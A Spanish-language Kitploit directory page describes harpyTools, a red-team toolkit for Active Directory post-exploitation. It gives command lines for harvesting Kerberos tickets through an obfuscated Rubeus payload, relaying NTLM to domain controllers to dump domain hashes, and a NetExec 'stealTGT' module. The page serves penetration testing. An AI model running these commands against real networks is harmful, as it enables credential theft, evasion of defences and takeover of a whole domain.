Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jssngc/harpytools
Escalada de PrivilegiosGeneración de PayloadsExplotaciónMovimiento LateralShellcodePost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
GitHubjssngc/harpytools

harpyTools

Herramienta automatizada de post-explotación de Active Directory para extracción de tickets Kerberos, ataques de relay NTLM y movimiento lateral mediante integración con NetExec, Impacket y Donut.

Ver Repositorio
19215hace 7 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Utilidades de Automatización de Post-Explotación y Relay en Active Directory

Este repositorio contiene una colección de scripts orquestadores en Python diseñados para evaluaciones de seguridad y pruebas de penetración en entornos Active Directory. Estas herramientas están específicamente diseñadas para escenarios de post-explotación donde ya se ha obtenido acceso administrativo local en una estación de trabajo o servidor comprometido, y el objetivo es realizar movimiento lateral o escalada de privilegios hacia el dominio Active Directory más amplio.

Al automatizar flujos de trabajo que involucran utilidades de seguridad comunes como NetExec, Impacket, Donut y BloodyAD, estos scripts simplifican procesos complejos de varios pasos en operaciones repetibles de un solo comando.

Requisitos previos

Los scripts requieren que las siguientes herramientas estén instaladas en el sistema anfitrión y disponibles en el PATH del sistema:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (Generador de shellcode)
  • Myph (Compilador/ofuscador de binarios)
  • BloodyAD (Herramienta de administración de Active Directory)
  • Utilidades estándar de Linux: awk, base64

Dependencias opcionales de Python

Para un formato mejorado de salida en consola, instale los siguientes paquetes:

root@kitploit:~
pip install colorama rich

Resumen de componentes

1. Orquestador de extracción de TGT (harpyTGT.py)

Este script automatiza la extracción de un Ticket de Concesión de Tickets (TGT) de Kerberos desde una sesión de Windows iniciada y lo convierte a un formato ccache compatible con Linux.

  • Escenario: Una vez que se obtiene acceso de administrador local en una máquina, esta herramienta permite a los operadores cosechar los tickets Kerberos de usuarios de dominio activos en ese host, facilitando el movimiento lateral sin conocer sus contraseñas en texto plano.
  • Mecanismo: Genera un payload de shellcode Rubeus.exe a través de Donut, aplica ofuscación usando Myph y ejecuta el binario resultante en el host de destino utilizando tareas programadas (schtask_as) o mmcexec.

Ejecución estándar (El usuario objetivo tiene privilegios administrativos):

root@kitploit:~
./harpyTGT.py -t <IP_OBJETIVO> -u <USUARIO_ADMIN_LOCAL> -p <CONTRASEÑA_ADMIN_LOCAL> -U <USUARIO_OBJETIVO> -r </ruta/a/Rubeus.exe>

Ejecución alternativa (El usuario objetivo carece de privilegios administrativos):

root@kitploit:~
./harpyTGT.py -t <IP_OBJETIVO> -u <USUARIO_ADMIN_LOCAL> -p <CONTRASEÑA_ADMIN_LOCAL> -U <USUARIO_OBJETIVO> -r </ruta/a/Rubeus.exe> --no-target-admin --attacker-ip <IP_ATACANTE>

2. Automatización de Relay NTLM (harpyRelay.py)

Este script coordina ataques de relay NTLM dirigidos a políticas de firma SMB o LDAP mal configuradas en Controladores de Dominio para lograr escalada de privilegios a nivel de dominio o realizar un volcado de la base de datos NTDS (DCSync).

  • Escenario: Utilizando privilegios de administrador local existentes en un host comprometido, el script fuerza a un proceso con altos privilegios (como una sesión de Administrador de Dominio) a autenticarse de vuelta al atacante, retransmitiendo esas credenciales al Controlador de Dominio para comprometer todo el dominio a través de LDAP/LDAPS.
  • Mecanismo: Lanza un listener ntlmrelayx, desencadena una solicitud de autenticación desde el cliente comprometido a través de NetExec, monitorea la salida en busca de explotación exitosa y vuelca los hashes del dominio. La herramienta contiene rutinas de limpieza automatizadas para minimizar la huella en el dominio objetivo.

Flujo LDAPS (Estándar):

root@kitploit:~
./harpyRelay.py --target-host <IP_CLIENTE> --local-user <ADMIN_LOCAL> --local-pass <CONTRASEÑA_LOCAL> --domain-admin-user <ADMIN_DOMINIO> --attacker-ip <IP_ATACANTE> --dc-ip <IP_DC> --domain <DOMINIO.LOCAL>

Flujo LDAP (Flujo alternativo cuando LDAPS no está disponible):

root@kitploit:~
./harpyRelay.py --target-host <IP_CLIENTE> --local-user <ADMIN_LOCAL> --local-pass <CONTRASEÑA_LOCAL> --domain-admin-user <ADMIN_DOMINIO> --attacker-ip <IP_ATACANTE> --dc-ip <IP_DC> --domain <DOMINIO.LOCAL> --no-ldaps

3. Módulo de NetExec: stealTGT

Un módulo personalizado para NetExec (nxc) diseñado para extraer el Ticket de Concesión de Tickets (TGT) de Kerberos de un usuario específico que ha iniciado sesión en la máquina objetivo.

El módulo interactúa a través de mmcexec como SYSTEM, automatizando la generación de un payload evasivo (encapsulando Rubeus con Donut y Myph), ejecutándolo en memoria, capturando la salida del ticket en Base64 y convirtiéndolo de forma transparente en un archivo .ccache listo para usar en Linux.

Requisitos previos en el host atacante (Kali Linux)

El módulo verifica automáticamente que las siguientes utilidades estén instaladas y disponibles en su $PATH:

  • donut
  • myph
  • impacket-ticketConverter

Instalación del módulo

Para cargar el módulo externo en NetExec, copie el script stealTGT.py en su directorio local de módulos de NetExec:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

Uso y sintaxis

root@kitploit:~
netexec smb <IP_OBJETIVO> -u <USUARIO_ADMIN> -p <CONTRASEÑA_ADMIN> --local-auth -M stealTGT -o USER=<USUARIO_OBJETIVO> RUBEUS=/ruta/a/Rubeus.exe

Opciones del módulo (-o):

  • USER: El nombre de usuario de la sesión iniciada actualmente de la cual desea cosechar el TGT (ej., jdoe).
  • RUBEUS: La ruta local en su máquina atacante donde se encuentra el binario legítimo Rubeus.exe.

Características operativas

  • Limpieza automatizada del entorno: La utilidad de relay rastrea las cuentas efímeras creadas durante la ejecución e intenta automáticamente su eliminación mediante bloodyad o netexec una vez que las operaciones concluyen.
  • Manejo de entornos sin TLS: Incluye respaldos explícitos para entornos donde los Controladores de Dominio no soportan LDAP sobre TLS (LDAPS).

Aviso legal

AVISO IMPORTANTE: Este repositorio está destinado estrictamente a auditorías de seguridad autorizadas, investigación de vulnerabilidades y fines educativos. Ejecutar estas herramientas contra infraestructura de producción sin autorización previa, explícita y por escrito de los propietarios del sistema está estrictamente prohibido. El autor no asume ninguna responsabilidad por uso indebido, daños colaterales o consecuencias legales derivadas del despliegue de este software.

Descargar herramienta